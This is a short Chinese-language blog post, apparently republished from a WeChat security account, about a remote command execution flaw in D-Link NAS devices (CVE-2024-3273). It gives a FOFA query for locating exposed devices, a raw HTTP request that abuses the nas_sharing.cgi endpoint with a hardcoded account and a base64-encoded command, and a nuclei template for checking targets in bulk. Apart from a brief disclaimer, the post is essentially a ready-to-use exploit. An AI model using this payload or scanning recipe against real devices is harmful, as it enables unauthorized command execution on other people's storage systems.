免责声明：

本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

漏洞描述

D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞

fofa语句

body="Text:In order to access the ShareCenter"

漏洞复现

打开页面

构造payload

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd==&cmd=15&system=aWQ= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/40.0.874.0 Safari/531.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close

nuclei批量验证

id: D-Link-rce-CVE-2024-3273

info:
  name: D-Link-rce-CVE-2024-3273
  author: changge
  severity: info
  description: description
  reference:
    - https://
  tags: tags

http:
  - raw: 
    - |
      GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd==&cmd=15&system=aWQ= HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
      Accept: */*
      Connection: Keep-Alive

    matchers:
      - type: dsl
        dsl: 
         - 'contains(body,"uid")'

pocsuite3 验证（github获取）

verify 验证

attack 验证

github poc总汇地址：https://github.com/AYcg/poc

原文始发于微信公众号（长歌安全）：D-Link设备远程命令执行漏洞(CVE-2024-3273)